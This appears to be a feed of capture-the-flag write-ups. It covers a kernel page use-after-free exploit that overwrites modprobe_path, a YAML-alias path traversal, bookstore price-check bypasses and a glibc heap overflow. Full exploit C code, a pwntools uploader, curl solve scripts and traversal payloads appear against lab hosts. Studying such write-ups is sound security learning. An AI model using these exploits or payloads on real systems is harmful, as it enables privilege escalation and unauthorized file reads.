1; for (int j = 0; j \u0026lt; 14 \u0026amp;\u0026amp; ok; j++) if (w[KNOWN_OFF + j] != ref[j]) ok = 0; if (ok) { mod_phys = (uint64_t)chunk * PAGE_2M + KNOWN_OFF; found = 1; } } } for (int chunk = 0; chunk \u0026lt; MAX_CHUNKS; chunk++) uaf[chunk] = saved_pmds[chunk]; tlb_flush(); /* Slow scan fallback */ if (!found) { printf(\u0026#34;[*] Fast scan missed, trying slow scan...\\n\u0026#34;); uint64_t saved_pmd = uaf[0]; for (int chunk = 0; chunk \u0026lt; MAX_CHUNKS \u0026amp;\u0026amp; !found; chunk++) { uint64_t phys = (uint64_t)chunk * PAGE_2M; uaf[0] = phys | PMD_HUGE; tlb_flush(); for (int off = 0; off \u0026lt;= (int)PAGE_2M - 15 \u0026amp;\u0026amp; !found; off += 8) { if (window[off] != \u0026#39;/\u0026#39;) continue; if (window[off+5] != \u0026#39;/\u0026#39; || window[off+6] != \u0026#39;m\u0026#39;) continue; const char *ref = \u0026#34;/sbin/modprobe\u0026#34;; int ok = 1; for (int j = 0; j \u0026lt; 14 \u0026amp;\u0026amp; ok; j++) if (window[off + j] != ref[j]) ok = 0; if (ok) { mod_phys = phys + off; found = 1; } } } uaf[0] = saved_pmd; tlb_flush(); } if (!found) { printf(\u0026#34;[-] Not found\\n\u0026#34;); return 1; } printf(\u0026#34;[+] modprobe_path @ phys 0x%lx\\n\u0026#34;, mod_phys); /* ---- Prepare payload ---- */ system(\u0026#34;echo \u0026#39;#!/bin/sh\\ncp /flag /tmp/flag\\nchmod 777 /tmp/flag\u0026#39;\u0026#34; \u0026#34; \u0026gt; /tmp/x \u0026amp;\u0026amp; chmod +x /tmp/x\u0026#34;); /* ---- Overwrite modprobe_path ---- */ uint64_t mod_chunk = (mod_phys / PAGE_2M) * PAGE_2M; int mod_off = mod_phys - mod_chunk; uaf[0] = mod_chunk | PMD_HUGE; tlb_flush(); volatile char *p = window + mod_off; p[0]=\u0026#39;/\u0026#39;; p[1]=\u0026#39;t\u0026#39;; p[2]=\u0026#39;m\u0026#39;; p[3]=\u0026#39;p\u0026#39;; p[4]=\u0026#39;/\u0026#39;; p[5]=\u0026#39;x\u0026#39;; p[6]=\u0026#39;\\0\u0026#39;; uaf[0] = saved_pmd; tlb_flush(); printf(\u0026#34;[+] modprobe_path -\u0026gt; /tmp/x\\n\u0026#34;); /* ---- Trigger ---- */ system(\u0026#34;echo -ne \u0026#39;\\\\xff\\\\xff\\\\xff\\\\xff\u0026#39; \u0026gt; /tmp/dummy\u0026#34; \u0026#34; \u0026amp;\u0026amp; chmod +x /tmp/dummy\u0026#34; \u0026#34; \u0026amp;\u0026amp; /tmp/dummy 2\u0026gt;/dev/null; true\u0026#34;); usleep(100000); printf(\u0026#34;\\n\u0026#34;); system(\u0026#34;cat /tmp/flag 2\u0026gt;/dev/null || echo \u0026#39;[-] no flag\u0026#39;\u0026#34;); return 0; } solve.py (remote) #!/usr/bin/env python3 from pwn import * import base64, gzip, sys, os context.log_level = \u0026#34;info\u0026#34; EXPLOIT = os.path.join(os.path.dirname(os.path.abspath(__file__)), \u0026#34;exploit\u0026#34;) def upload(r, local_path, remote_path): with open(local_path, \u0026#34;rb\u0026#34;) as f: data = f.read() compressed = gzip.compress(data, compresslevel=9) b64 = base64.b64encode(compressed).decode() log.info(f\u0026#34;Upload: {len(data)}B -\u0026gt; {len(compressed)}B gz -\u0026gt; {len(b64)}B b64\u0026#34;) chunk_size = 960 chunks = [b64[i:i+chunk_size] for i in range(0, len(b64), chunk_size)] log.info(f\u0026#34;Sending {len(chunks)} chunks...\u0026#34;) r.sendline(b\u0026#34;cat /dev/null \u0026gt; /tmp/b64\u0026#34;) sleep(0.1) for i, chunk in enumerate(chunks): r.sendline(f\u0026#34;echo -n \u0026#39;{chunk}\u0026#39;\u0026gt;\u0026gt;/tmp/b64\u0026#34;.encode()) sleep(0.005) if i % 100 == 0 and i \u0026gt; 0: r.sendline(b\u0026#34;echo SYNC\u0026#34;) try: r.recvuntil(b\u0026#34;SYNC\\n\u0026#34;, timeout=10) except: r.recvuntil(b\u0026#34;$ \u0026#34;, timeout=5) log.info(f\u0026#34; {i}/{len(chunks)}\u0026#34;) r.sendline(b\u0026#34;echo ALLDONE\u0026#34;) r.recvuntil(b\u0026#34;ALLDONE\u0026#34;, timeout=30) log.info(\u0026#34;All chunks sent\u0026#34;) r.sendline(b\u0026#34;base64 -d /tmp/b64 \u0026gt; /tmp/e.gz \u0026amp;\u0026amp; gzip -d /tmp/e.gz \u0026amp;\u0026amp; mv /tmp/e \u0026#34; + remote_path.encode() + b\u0026#34; \u0026amp;\u0026amp; chmod +x \u0026#34; + remote_path.encode() + b\u0026#34; \u0026amp;\u0026amp; echo DECOK || echo DECFAIL\u0026#34;) resp = r.recvuntil([b\u0026#34;DECOK\u0026#34;, b\u0026#34;DECFAIL\u0026#34;], timeout=20) if b\u0026#34;DECFAIL\u0026#34; in resp: log.error(\u0026#34;Decode failed!\u0026#34;) return False log.success(\u0026#34;Decode OK\u0026#34;) return True if not os.path.exists(EXPLOIT): log.error(\u0026#34;Compile first: musl-gcc -static -Os -s -o exploit exploit.c\u0026#34;) sys.exit(1) r = remote(\u0026#34;localhost\u0026#34;, 1337) log.info(\u0026#34;Waiting for shell...\u0026#34;) r.recvuntil(b\u0026#34;$ \u0026#34;, timeout=30) log.success(\u0026#34;Got shell\u0026#34;) r.sendline(b\u0026#34;echo READY\u0026#34;) r.recvuntil(b\u0026#34;READY\u0026#34;, timeout=10) if not upload(r, EXPLOIT, \u0026#34;/tmp/exploit\u0026#34;): r.close() sys.exit(1) log.info(\u0026#34;Running exploit...\u0026#34;) r.sendline(b\u0026#34;/tmp/exploit\u0026#34;) try: while True: data = r.recv(timeout=10) if not data: break sys.stdout.buffer.write(data) sys.stdout.buffer.flush() except EOFError: pass r.close() Flag # 0xfun{r34l_k3rn3l_h4ck3rs_d0nt_unzip} ","date":"14 February 2026","externalUrl":null,"permalink":"/writeups/ctfs/0xfunctf-26/phantom/","section":"CTFs","summary":"Physical page UAF in a kernel module: reclaim the freed page as a PMD, forge 2MB huge page entries for arbitrary physical memory R/W, and overwrite modprobe_path to read the flag.","title":"Phantom","type":"ctfs"},{"content":"","date":"8 February 2026","externalUrl":null,"permalink":"/writeups/tags/aliasing/","section":"Tags","summary":"","title":"Aliasing","type":"tags"},{"content":"They call me the blogler.\nA blogging platform built with Flask. Users register, write blog posts in Markdown, and edit their blog\u0026rsquo;s YAML configuration through a Monaco editor. The flag sits at /flag on the server.\nThe app has explicit path traversal protection. It checks for ../ in filenames, blocks absolute paths, and verifies that resolved paths stay inside the blogs directory. Breaking through requires finding a way to mutate a filename after validation has already passed.\nApplication overview # The app has two main features: uploading blog posts (Markdown files saved to disk) and editing a YAML config that controls how your blog is served.\nWhen you visit /blog/\u0026lt;username\u0026gt;, the server reads each blog entry\u0026rsquo;s name field and opens that file from the blogs directory:\n@app.get(\u0026#34;/blog/\u0026lt;string:username\u0026gt;\u0026#34;) def serve_blog(username): if username not in users: return \u0026#34;username does not exist\u0026#34;, 404 blogs = [ {\u0026#34;title\u0026#34;: blog[\u0026#34;title\u0026#34;], \u0026#34;content\u0026#34;: mistune.html((blog_path / blog[\u0026#34;name\u0026#34;]).read_text())} for blog in users[username][\u0026#34;blogs\u0026#34;] ] return render_template(\u0026#34;blog.html\u0026#34;, blogs=blogs, name=users[username][\u0026#34;user\u0026#34;][\u0026#34;name\u0026#34;]) If we can control blog[\u0026quot;name\u0026quot;] to be something like ../../flag, the server will read /flag instead of a file inside blogs/. But there\u0026rsquo;s validation standing in the way.\nThe validation # When you submit a new YAML config, validate_conf checks every blog entry\u0026rsquo;s name field:\ndef validate_conf(old_cfg: dict, uploaded_conf: str) -\u0026gt; dict | str: try: conf = yaml.safe_load(uploaded_conf) for i, blog in enumerate(conf[\u0026#34;blogs\u0026#34;]): if not isinstance(blog.get(\u0026#34;title\u0026#34;), str): return f\u0026#34;please provide a \u0026#39;title\u0026#39; to the {i+1}th blog\u0026#34; # no lfi file_name = blog[\u0026#34;name\u0026#34;] assert isinstance(file_name, str) file_path = (blog_path / file_name).resolve() if \u0026#34;../\u0026#34; in file_name or file_name.startswith(\u0026#34;/\u0026#34;) or not file_path.is_relative_to(blog_path): return f\u0026#34;file path {file_name!r} is a hacking attempt. this incident will be reported\u0026#34; if not isinstance(conf.get(\u0026#34;user\u0026#34;), dict): conf[\u0026#34;user\u0026#34;] = dict() conf[\u0026#34;user\u0026#34;][\u0026#34;name\u0026#34;] = display_name(conf[\u0026#34;user\u0026#34;].get(\u0026#34;name\u0026#34;, old_cfg[\u0026#34;user\u0026#34;][\u0026#34;name\u0026#34;])) conf[\u0026#34;user\u0026#34;][\u0026#34;password\u0026#34;] = conf[\u0026#34;user\u0026#34;].get(\u0026#34;password\u0026#34;, old_cfg[\u0026#34;user\u0026#34;][\u0026#34;password\u0026#34;]) if not isinstance(conf[\u0026#34;user\u0026#34;][\u0026#34;password\u0026#34;], str): return \u0026#34;provide a valid password bro\u0026#34; return conf except Exception as e: return f\u0026#34;exception - {e}\u0026#34; Three checks block direct path traversal on each blog\u0026rsquo;s name:\n\u0026quot;../\u0026quot; in file_name rejects any filename containing the literal substring ../ file_name.startswith(\u0026quot;/\u0026quot;) rejects absolute paths not file_path.is_relative_to(blog_path) resolves the path and checks it stays under blogs/ These are solid. There\u0026rsquo;s no way to pass a string like ../../flag through this gauntlet. But notice what happens after the loop: there\u0026rsquo;s a call to display_name() that modifies conf[\u0026quot;user\u0026quot;][\u0026quot;name\u0026quot;]. That\u0026rsquo;s the next piece of the puzzle.\nThe display_name function # def display_name(username: str) -\u0026gt; str: return \u0026#34;\u0026#34;.join(p.capitalize() for p in username.split(\u0026#34;_\u0026#34;)) This is meant to create a display-friendly version of a username. It splits on underscores, capitalizes each part, and joins them back together. For example:\nInput Split parts After capitalize Joined john_doe [\u0026quot;john\u0026quot;, \u0026quot;doe\u0026quot;] [\u0026quot;John\u0026quot;, \u0026quot;Doe\u0026quot;] JohnDoe hello_world [\u0026quot;hello\u0026quot;, \u0026quot;world\u0026quot;] [\u0026quot;Hello\u0026quot;, \u0026quot;World\u0026quot;] HelloWorld Seems harmless. But look at what happens with carefully chosen inputs:\nInput Split parts After capitalize Joined ._._ [\u0026quot;.\u0026quot;, \u0026quot;.\u0026quot;, \u0026quot;\u0026quot;] [\u0026quot;.\u0026quot;, \u0026quot;.\u0026quot;, \u0026quot;\u0026quot;] .. The string ._._ becomes .. after processing. The capitalize() call on . returns . (there\u0026rsquo;s nothing to capitalize), and the underscores disappear.\nThis means display_name can produce path traversal sequences from inputs that don\u0026rsquo;t contain ../.\nYAML anchors and aliases # Here\u0026rsquo;s the core trick. YAML supports anchors (\u0026amp;name) and aliases (*name), which create shared references to the same object. This is a feature for avoiding repetition in config files:\ndefaults: \u0026amp;defaults timeout: 30 retries: 3 server_a: \u0026lt;\u0026lt;: *defaults host: a.example.com server_b: \u0026lt;\u0026lt;: *defaults host: b.example.com The critical detail: anchors and aliases don\u0026rsquo;t create copies. They create references to the same object in memory. In Python terms, after yaml.safe_load:\ndata[\u0026#34;defaults\u0026#34;] is data[\u0026#34;server_a\u0026#34;] # same dict object This means mutating one mutates the other. And that\u0026rsquo;s the key to bypassing validation.\nPutting it together # The validation loop checks conf[\u0026quot;blogs\u0026quot;][0][\u0026quot;name\u0026quot;], and then later the code does:\nconf[\u0026#34;user\u0026#34;][\u0026#34;name\u0026#34;] = display_name(conf[\u0026#34;user\u0026#34;].get(\u0026#34;name\u0026#34;, ...)) If conf[\u0026quot;user\u0026quot;] and conf[\u0026quot;blogs\u0026quot;][0] are the same dict object (via a YAML alias), then writing to conf[\u0026quot;user\u0026quot;][\u0026quot;name\u0026quot;] also overwrites conf[\u0026quot;blogs\u0026quot;][0][\u0026quot;name\u0026quot;].\nThe attack config:\nblogs: - \u0026amp;ref title: \u0026#34;flag\u0026#34; name: \u0026#34;._._/._._/flag\u0026#34; user: *ref Here\u0026rsquo;s the step-by-step execution:\nYAML parsing: yaml.safe_load creates one dict {\u0026quot;title\u0026quot;: \u0026quot;flag\u0026quot;, \u0026quot;name\u0026quot;: \u0026quot;._._/._._/flag\u0026quot;}. Both blogs[0] and user point to this same dict.\nValidation loop: The code checks blogs[0][\u0026quot;name\u0026quot;] which is \u0026quot;._._/._._/flag\u0026quot;. This passes all three checks:\n\u0026quot;../\u0026quot; in \u0026quot;._._/._._/flag\u0026quot; → False (no ../ substring) \u0026quot;._._/._._/flag\u0026quot;.startswith(\u0026quot;/\u0026quot;) → False The resolved path stays under blog_path (since there\u0026rsquo;s no actual .. yet) The mutation: After the loop, the code runs:\nconf[\u0026#34;user\u0026#34;][\u0026#34;name\u0026#34;] = display_name(conf[\u0026#34;user\u0026#34;].get(\u0026#34;name\u0026#34;, ...)) conf[\u0026quot;user\u0026quot;] is the same dict as blogs[0], so conf[\u0026quot;user\u0026quot;].get(\u0026quot;name\u0026quot;) returns \u0026quot;._._/._._/flag\u0026quot;. Then display_name processes it:\ndisplay_name(\u0026#34;._._/._._/flag\u0026#34;) # split(\u0026#34;_\u0026#34;) → [\u0026#34;.\u0026#34;, \u0026#34;.\u0026#34;, \u0026#34;/.\u0026#34;, \u0026#34;.\u0026#34;, \u0026#34;/flag\u0026#34;] # capitalize each → [\u0026#34;.\u0026#34;, \u0026#34;.\u0026#34;, \u0026#34;/.\u0026#34;, \u0026#34;.\u0026#34;, \u0026#34;/flag\u0026#34;] # join → \u0026#34;../../flag\u0026#34; Why does capitalize() leave everything unchanged? It uppercases only the first character and lowercases the rest. The first character in each part is either . or /, and non-alphabetic characters have no uppercase form, so they pass through. The remaining letters (flag) are already lowercase, so lowercasing them is a no-op.\nThe concatenation builds up ../../flag piece by piece:\nThis overwrites blogs[0][\u0026quot;name\u0026quot;] to \u0026quot;../../flag\u0026quot;. Validation already passed, so it\u0026rsquo;s too late to catch it.\nReading the blog: When someone visits /blog/\u0026lt;username\u0026gt;, the server does:\n(blog_path / blog[\u0026#34;name\u0026#34;]).read_text() Which resolves blogs/../../flag → /flag, and we get the flag.\nExploit # Register an account with any username and password\nSubmit the malicious YAML config via the config editor:\nblogs: - \u0026amp;ref title: \u0026#34;flag\u0026#34; name: \u0026#34;._._/._._/flag\u0026#34; user: *ref Visit /blog/\u0026lt;your_username\u0026gt;. The server reads /flag and renders it as your blog post\nYou can do all of this through the web UI. Paste the YAML into the config editor on the left side, hit \u0026ldquo;Update Config\u0026rdquo;, then click the \u0026ldquo;blog\u0026rdquo; link to view your page.\nWhy the fix is hard # The root cause isn\u0026rsquo;t just the display_name function or the YAML aliases individually, it\u0026rsquo;s the combination. The code validates a data structure, then mutates part of it, not realizing that YAML aliasing has linked that part to something already validated.\nDefenses that would prevent this:\nDeep-copy the parsed YAML before processing, breaking shared references Validate after all mutations, not before Don\u0026rsquo;t mutate the config in-place, build a new dict for the validated output Flag # lactf{7m_g0nn4_bl0g_y0u} ","date":"8 February 2026","externalUrl":null,"permalink":"/writeups/ctfs/lactf-26/blogler/","section":"CTFs","summary":"YAML anchor aliasing creates a shared reference that bypasses path validation via display_name mutation.","title":"Blogler","type":"ctfs"},{"content":"","date":"8 February 2026","externalUrl":null,"permalink":"/writeups/tags/bun/","section":"Tags","summary":"","title":"Bun","type":"tags"},{"content":"","date":"8 February 2026","externalUrl":null,"permalink":"/writeups/tags/house-of-apple-2/","section":"Tags","summary":"","title":"House-of-Apple-2","type":"tags"},{"content":"","date":"8 February 2026","externalUrl":null,"permalink":"/writeups/tags/javascript/","section":"Tags","summary":"","title":"Javascript","type":"tags"},{"content":"","date":"8 February 2026","externalUrl":null,"permalink":"/writeups/ctfs/lactf-26/","section":"CTFs","summary":"","title":"LA CTF 2026","type":"ctfs"},{"content":"","date":"8 February 2026","externalUrl":null,"permalink":"/writeups/tags/lfi/","section":"Tags","summary":"","title":"Lfi","type":"tags"},{"content":"","date":"8 February 2026","externalUrl":null,"permalink":"/writeups/tags/libc-got/","section":"Tags","summary":"","title":"Libc-Got","type":"tags"},{"content":"I heard Amazon killed a certain book store so I\u0026rsquo;m gonna make my own book store and kill Amazon.\nI dove deep and delivered results.\nThe bobler\nTwo challenges, same bookstore. You start with $1000 and need to buy a flag that costs $1,000,000. The original \u0026ldquo;Narnes and Bobles\u0026rdquo; had a type confusion bug in a book price (string instead of number). The revenge \u0026ldquo;Bobles and Narnes\u0026rdquo; fixes that specific bug, but the same codebase has a second, subtler flaw: Bun SQL\u0026rsquo;s db() helper infers INSERT columns from the first object in a batch, silently dropping keys that only appear in later objects.\nThe application # The server is a Bun + Express bookstore backed by an in-memory SQLite database. Users register, get a $1000 balance, and can add books to their cart and check out. The checkout endpoint zips up the purchased files and sends them as a download.\nFour books are available:\nBook Price The Part-Time Parliament $10 The End of Cryptography $20 AVDestroyer Origin Lore $40 Flag $1,000,000 Each book has a \u0026ldquo;sample\u0026rdquo; variant (a preview file) and the full version. Sample items are free; full items cost their listed price.\nThe cart table stores items with three columns:\nCREATE TABLE cart_items ( username TEXT, book_id TEXT, is_sample INT, ... ); The price check # When adding products to the cart, /cart/add performs a balance check. This is the critical code path:\napp.post(\u0026#39;/cart/add\u0026#39;, needsAuth, async (req, res) =\u0026gt; { const productsToAdd = req.body.products; const [{ balance }] = await db`SELECT balance FROM users WHERE username=${res.locals.username}`; const [{ cartSum }] = await db` SELECT SUM(books.price) AS cartSum FROM cart_items JOIN books ON books.id = cart_items.book_id WHERE cart_items.username = ${res.locals.username} AND cart_items.is_sample = 0 `; const additionalSum = productsToAdd .filter((product) =\u0026gt; !+product.is_sample) .map((product) =\u0026gt; booksLookup.get(product.book_id).price ?? 99999999) .reduce((l, r) =\u0026gt; l + r, 0); if (additionalSum + cartSum \u0026gt; balance) { return res.json({ err: \u0026#39;too poor, have you considered geting more money?\u0026#39; }) } const cartEntries = productsToAdd.map((prod) =\u0026gt; ({ ...prod, username: res.locals.username })); await db`INSERT INTO cart_items ${db(cartEntries)}`; // ... }); The check works in two parts:\nSQL sum: tallies prices of non-sample items already in the cart (WHERE is_sample = 0) JS sum: tallies prices of non-sample items being added now (.filter((product) =\u0026gt; !+product.is_sample)) If the total exceeds the user\u0026rsquo;s balance, the request is rejected. Otherwise, the products are inserted into the database.\nHow checkout determines which file to serve # At checkout, the server reads each cart item and decides whether to serve the full file or the sample:\nconst path = item.is_sample ? book.file.replace(/\\.([^.]+)$/, \u0026#39;_sample.$1\u0026#39;) : book.file; const content = await Bun.file(\u0026#39;books/\u0026#39; + path).bytes(); If is_sample is truthy, you get flag_sample.txt. If falsy, you get flag.txt (the real flag). Importantly, checkout has no price validation. It just deducts from your balance (which can go negative) and serves the files.\nSo the goal is clear: get the flag book into your cart with is_sample stored as a falsy value in the database, while somehow passing the price check during add.\nThe original bug (narnes-and-bobles) # In the original challenge, the first book\u0026rsquo;s price in books.json was a string:\n{ \u0026#34;id\u0026#34;: \u0026#34;a3e33c2505a19d18\u0026#34;, \u0026#34;title\u0026#34;: \u0026#34;The Part-Time Parliament\u0026#34;, \u0026#34;price\u0026#34;: \u0026#34;10\u0026#34; } All other prices were numbers. This created a type confusion in the reduce operation.\nWhen you add both the Parliament book and the flag in one request, the reduce processes them left to right with initial value 0:\nStep 1: 0 + \u0026#34;10\u0026#34; = \u0026#34;010\u0026#34; (number + string = string concatenation!) Step 2: \u0026#34;010\u0026#34; + 1000000 = \u0026#34;0101000000\u0026#34; (still concatenating) Now additionalSum is the string \u0026quot;0101000000\u0026quot;. The balance check becomes:\n\u0026#34;0101000000\u0026#34; + null \u0026gt; 1000 // \u0026#34;0101000000null\u0026#34; \u0026gt; 1000 // NaN \u0026gt; 1000 // false \u0026lt;-- check passes! The string can\u0026rsquo;t be parsed as a number, so JavaScript coerces it to NaN. And NaN \u0026gt; anything is always false. The price check silently passes for any amount.\nSolve (narnes-and-bobles) # TARGET=\u0026#34;https://narnes-and-bobles-XXXXX.instancer.lac.tf\u0026#34; USER=\u0026#34;solve_$(date +%s)\u0026#34; curl -s -c /tmp/cookies.txt -X POST \u0026#34;$TARGET/register\u0026#34; \\ -H \u0026#34;Content-Type: application/x-www-form-urlencoded\u0026#34; \\ -d \u0026#34;username=${USER}\u0026amp;password=pass\u0026#34; # Parliament (string price) first, then flag -- order matters for reduce curl -s -b /tmp/cookies.txt -X POST \u0026#34;$TARGET/cart/add\u0026#34; \\ -H \u0026#34;Content-Type: application/json\u0026#34; \\ -d \u0026#39;{\u0026#34;products\u0026#34;: [{\u0026#34;book_id\u0026#34;: \u0026#34;a3e33c2505a19d18\u0026#34;, \u0026#34;is_sample\u0026#34;: 0}, {\u0026#34;book_id\u0026#34;: \u0026#34;2a16e349fb9045fa\u0026#34;, \u0026#34;is_sample\u0026#34;: 0}]}\u0026#39; curl -s -b /tmp/cookies.txt -X POST \u0026#34;$TARGET/cart/checkout\u0026#34; -o /tmp/solve.zip unzip -p /tmp/solve.zip flag.txt What the revenge changed # The fix is exactly one line. In books.json:\n- \u0026#34;price\u0026#34;: \u0026#34;10\u0026#34; + \u0026#34;price\u0026#34;: 10 The string price becomes a proper number. Now the reduce always produces a numeric sum, and the NaN trick no longer works. The flag\u0026rsquo;s price of 1,000,000 correctly exceeds the $1000 balance, and the check rejects it.\nEverything else in the codebase is identical (aside from some debug console.log statements).\nFinding the new bug # The insert at the end of /cart/add uses Bun SQL\u0026rsquo;s tagged template helper:\nconst cartEntries = productsToAdd.map((prod) =\u0026gt; ({ ...prod, username: res.locals.username })); await db`INSERT INTO cart_items ${db(cartEntries)}`; The db(cartEntries) call takes an array of objects and generates a batch INSERT statement. To do this, it needs to decide which columns to include. Bun\u0026rsquo;s implementation infers the column list from the keys of the first object in the array.\nThis means: if the first object is { book_id: \u0026quot;abc\u0026quot;, username: \u0026quot;me\u0026quot; } (no is_sample key), the generated SQL is:\nINSERT INTO cart_items (book_id, username) VALUES (?, ?), (?, ?) The is_sample column is simply absent from the INSERT. SQLite fills it with NULL for every row, regardless of whether later objects in the array had an is_sample property.\nBut here\u0026rsquo;s the critical part: the price check runs on the raw JavaScript objects from req.body.products, before the INSERT. The JS filter uses !+product.is_sample, which reads the is_sample property directly from each object.\nSo we have a mismatch:\nJS price check: sees the raw is_sample value from user input (per object) Database INSERT: only uses columns from the first object, dropping is_sample entirely if the first object doesn\u0026rsquo;t have it The exploit # Send two products in a single /cart/add request:\n{ \u0026#34;products\u0026#34;: [ { \u0026#34;book_id\u0026#34;: \u0026#34;a3e33c2505a19d18\u0026#34; }, { \u0026#34;book_id\u0026#34;: \u0026#34;2a16e349fb9045fa\u0026#34;, \u0026#34;is_sample\u0026#34;: 1 } ] } The first product (Parliament, $10) has no is_sample key. The second product (Flag) has is_sample: 1.\nWhat happens at add time (JS) # The filter .filter((product) =\u0026gt; !+product.is_sample) runs on each raw object:\nParliament: product.is_sample is undefined (key missing). +undefined = NaN. !NaN = true. Kept as non-sample. Price = $10. Flag: product.is_sample is 1. +1 = 1. !1 = false. Filtered out (treated as sample, not counted). additionalSum = 10. The balance check: 10 + null \u0026lt;= 1000. Passes.\nWhat happens at insert time (Bun SQL) # db() sees the first object\u0026rsquo;s keys: { book_id, username }. No is_sample. The INSERT becomes:\nINSERT INTO cart_items (book_id, username) VALUES (\u0026#39;a3e3...\u0026#39;, \u0026#39;me\u0026#39;), (\u0026#39;2a16...\u0026#39;, \u0026#39;me\u0026#39;) Both rows get is_sample = NULL.\nWhat happens at checkout # const path = item.is_sample ? book.file.replace(/\\.([^.]+)$/, \u0026#39;_sample.$1\u0026#39;) : book.file; item.is_sample is NULL, which JavaScript reads as null. null is falsy. The ternary takes the else branch: book.file = \u0026quot;flag.txt\u0026quot;. We get the full flag file.\nThe balance goes negative (1000 - 1000010 = -999010), but there\u0026rsquo;s no check preventing that at checkout.\nSolve (bobles-and-narnes) # TARGET=\u0026#34;https://bobles-and-narnes-XXXXX.instancer.lac.tf\u0026#34; USER=\u0026#34;solve_$(date +%s)\u0026#34; # Register curl -s -c /tmp/cookies.txt -X POST \u0026#34;$TARGET/register\u0026#34; \\ -H \u0026#34;Content-Type: application/x-www-form-urlencoded\u0026#34; \\ -d \u0026#34;username=${USER}\u0026amp;password=pass\u0026#34; # Add flag to cart (first product missing is_sample key) curl -s -b /tmp/cookies.txt -X POST \u0026#34;$TARGET/cart/add\u0026#34; \\ -H \u0026#34;Content-Type: application/json\u0026#34; \\ -d \u0026#39;{\u0026#34;products\u0026#34;: [{\u0026#34;book_id\u0026#34;: \u0026#34;a3e33c2505a19d18\u0026#34;}, {\u0026#34;book_id\u0026#34;: \u0026#34;2a16e349fb9045fa\u0026#34;, \u0026#34;is_sample\u0026#34;: 1}]}\u0026#39; # Checkout and extract flag curl -s -b /tmp/cookies.txt -X POST \u0026#34;$TARGET/cart/checkout\u0026#34; -o /tmp/solve.zip unzip -p /tmp/solve.zip flag.txt Flags # Narnes and Bobles:\nlactf{matcha_dubai_chocolate_labubu} Bobles and Narnes:\nlactf{hojicha_chocolate_dubai_labubu} ","date":"8 February 2026","externalUrl":null,"permalink":"/writeups/ctfs/lactf-26/narnes-bobles-and-bobles-narnes/","section":"CTFs","summary":"Two type confusion bugs in a Bun bookstore: string price NaN trick, then batch INSERT column inference.","title":"Narnes and Bobles \u0026 Bobles and Narnes","type":"ctfs"},{"content":"","date":"8 February 2026","externalUrl":null,"permalink":"/writeups/tags/path-traversal/","section":"Tags","summary":"","title":"Path-Traversal","type":"tags"},{"content":"","date":"8 February 2026","externalUrl":null,"permalink":"/writeups/tags/sqlite/","section":"Tags","summary":"","title":"Sqlite","type":"tags"},{"content":"I\u0026rsquo;m telling you, tcache poisoning doesn\u0026rsquo;t just happen due to double-frees!\nnc chall.lac.tf 31144 The challenge is a classic heap note manager (create, delete, read) with only 2 note slots and a maximum allocation size of 0xf8. The vulnerability is an integer underflow in the size calculation that gives us a massive heap overflow. We\u0026rsquo;ll cover two approaches to get a shell from there: the intended solution overwrites strlen\u0026rsquo;s GOT entry inside libc itself, and the alternative uses a House of Apple 2 FSOP chain. Both leak heap and libc addresses via the overflow primitive.\nThe vulnerability # Here\u0026rsquo;s the function that reads data into a note. Pay attention to the developer\u0026rsquo;s comment:\nint read_data_into_note(int index, char *note, unsigned short size) { // I prevented all off-by-one\u0026#39;s by forcing the size to be at least 7 // less than what was declared by the user! I am so smart unsigned short resized_size = size == 8 ? (unsigned short)(size - 7) : (unsigned short)(size - 8); int bytes = read(0, note, resized_size); if (bytes \u0026lt; 0) { puts(\u0026#34;Read error\u0026#34;); exit(1); } if (note[bytes-1] == \u0026#39;\\n\u0026#39;) note[bytes-1] = \u0026#39;\\x00\u0026#39;; } The developer was so focused on preventing off-by-one errors that they missed something much worse. The special case for size == 8 makes resized_size = 1, and all other sizes get 8 subtracted. Sounds safe, right?\nHere\u0026rsquo;s how the note gets created:\nvoid create_note() { int index = get_note_index(); unsigned short size; // ... scanf(\u0026#34;%hu\u0026#34;, \u0026amp;size); if (size \u0026lt; 0 || size \u0026gt; 0xf8) { puts(\u0026#34;Invalid size!!!\u0026#34;); exit(1); } notes[index] = malloc(size); printf(\u0026#34;Data: \u0026#34;); read_data_into_note(index, notes[index], size); } The size check allows size = 0. And when size = 0:\nsize == 8 is false, so we take the else branch resized_size = (unsigned short)(0 - 8) = 65528 The subtraction wraps around because unsigned short can\u0026rsquo;t go negative, it wraps to 65528 (0xfff8). Meanwhile, malloc(0) returns the smallest possible chunk (0x20 bytes). So read() will happily write 65528 bytes into a 0x20-byte allocation. The developer prevented the off-by-one and introduced a 65KB heap overflow instead.\nBackground: glibc heap internals # If you\u0026rsquo;re already comfortable with glibc malloc, tcache, safe-linking, and bin mechanics, skip ahead to the exploit strategy.\nChunks # Every malloc() allocation lives inside a \u0026ldquo;chunk.\u0026rdquo; A chunk has a 0x10-byte header (two 8-byte fields) followed by user data. Internally, glibc tracks the chunk by a pointer to the header (where prev_size starts). But malloc() returns a pointer 0x10 bytes later, to the start of the user data. So when you see malloc() return 0x5555deadbef0, the actual chunk header starts at 0x5555deadbee0.\nblock-beta columns 2 A[\"prev_size (8 bytes)\"]:1 B[\"size | flags (8 bytes)\"]:1 C[\"user data\\n(what malloc returns)\"]:2 style A fill:#2d333b,stroke:#444 style B fill:#2d333b,stroke:#444 style C fill:#1a6334,stroke:#2ea043 The size field includes metadata flags in the low 3 bits. The most important flag is bit 0 (PREV_INUSE), which indicates whether the previous chunk is allocated. When a chunk is freed, its user data area gets repurposed to store linked-list pointers (fd and bk).\nmalloc(0) returns a 0x20-size chunk (the minimum). malloc(0xf8) returns a 0x100-size chunk. The size always includes the 0x10 header and is rounded up to the nearest 0x10.\nTcache # Tcache (thread-local cache) is the first place glibc looks when allocating or freeing small chunks. Each thread has bins for sizes 0x20, 0x30, \u0026hellip;, 0x410, each holding up to 7 chunks.\nWhen you free a chunk that fits in tcache:\nThe chunk goes onto the front of the tcache bin (LIFO stack) The first 8 bytes of user data become the fd pointer (next entry in the bin) When you malloc a chunk that has a matching tcache entry:\nPop the first entry from the tcache bin Return it immediately (no coalescing, no checks in older glibc) Safe-linking (glibc 2.32+) # Here\u0026rsquo;s the catch for modern exploitation. Since glibc 2.32, tcache (and fastbin) fd pointers are mangled:\n#define PROTECT_PTR(pos, ptr) ((size_t)(pos) \u0026gt;\u0026gt; 12) ^ (size_t)(ptr) #define REVEAL_PTR(pos, ptr) PROTECT_PTR(pos, ptr) // same operation (XOR is self-inverse) When a chunk is freed into tcache, instead of storing fd = next_chunk, glibc stores:\nfd = (address_of_fd_field \u0026gt;\u0026gt; 12) XOR next_chunk_address To poison the tcache, we need to know address_of_fd_field \u0026gt;\u0026gt; 12, 